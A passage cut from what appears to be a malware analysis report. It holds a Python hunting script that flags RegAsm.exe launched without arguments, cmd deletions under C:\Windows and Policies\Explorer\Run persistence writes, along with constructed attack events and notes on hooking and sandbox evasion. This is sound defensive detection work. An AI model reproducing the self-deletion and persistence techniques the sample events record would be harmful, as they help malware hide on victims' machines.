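                                 f"{base} started by {ntpath.basename(parent)} with no arguments"))
            # Rule 2: a cmd.exe one-liner deleting a binary under C:\Windows.
            if base == "cmd.exe":
                m = DEL_RE.search(args)
                target = (m.group(1) or m.group(2)) if m else None
                if target and target.lower().startswith("c:\\windows\\"):
                    findings.append(("shell_deletes_windows_binary", ev["ProcessId"],
                                     f"{ntpath.basename(parent)} -> cmd /c del {target}"))
        elif ev["EventID"] == 13:
            m = PERSIST_KEY_RE.search(ev["TargetObject"])
            if m:
                findings.append(("policies_explorer_run_value", ev["ProcessId"],
                                 f"{ntpath.basename(ev['Image'])} set value {m.group(1)}"))
    return findings


# Constructed events mirroring the report's process tree and registry write.
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CSCRIPT = r"C:\Windows\SysWOW64\cscript.exe"
DOC11 = r"C:\Users\user\Desktop\Doc11.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 1000, "Image": DOC11, "CommandLine": f"'{DOC11}'",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 1020, "Image": REGASM, "CommandLine": REGASM, "ParentImage": DOC11},
    {"EventID": 1, "ProcessId": 1030, "Image": REGASM, "CommandLine": REGASM, "ParentImage": DOC11},
    # Parent for cscript.exe is an assumption; the report lists its creator as unknown.
    {"EventID": 1, "ProcessId": 1040, "Image": CSCRIPT, "CommandLine": CSCRIPT,
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 1050, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": f'"C:\\Windows\\SysWOW64\\cmd.exe" /c del "{REGASM}"', "ParentImage": CSCRIPT},
    {"EventID": 1, "ProcessId": 1060, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    # Benign control: cscript with a real script argument must not fire rule 1.
    {"EventID": 1, "ProcessId": 1070, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 13, "ProcessId": 1040, "Image": CSCRIPT,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\3FL0ZNGX9"},
    # Benign control: an unrelated registry write must not fire rule 3.
    {"EventID": 13, "ProcessId": 1000, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

if __name__ == "__main__":
    for rule, pid, detail in hunt(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid:<6} {detail}")
```

Rule 1 on its own also fires when someone runs RegAsm.exe interactively with no arguments (it only prints usage), so in production weight it by the parent: a launch from a user-profile executable, as in this report, is the high-confidence case. The key regex deliberately ignores the hive so the HKCU form of Policies\Explorer\Run is caught as well.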

### Hooking and other Techniques for Hiding and Protection:

 Modifies the prolog of user mode functions (user mode inline hooks)
 Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
 Disables application error messages (SetErrorMode)
 Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX (18 identical entries)
 Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)

### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements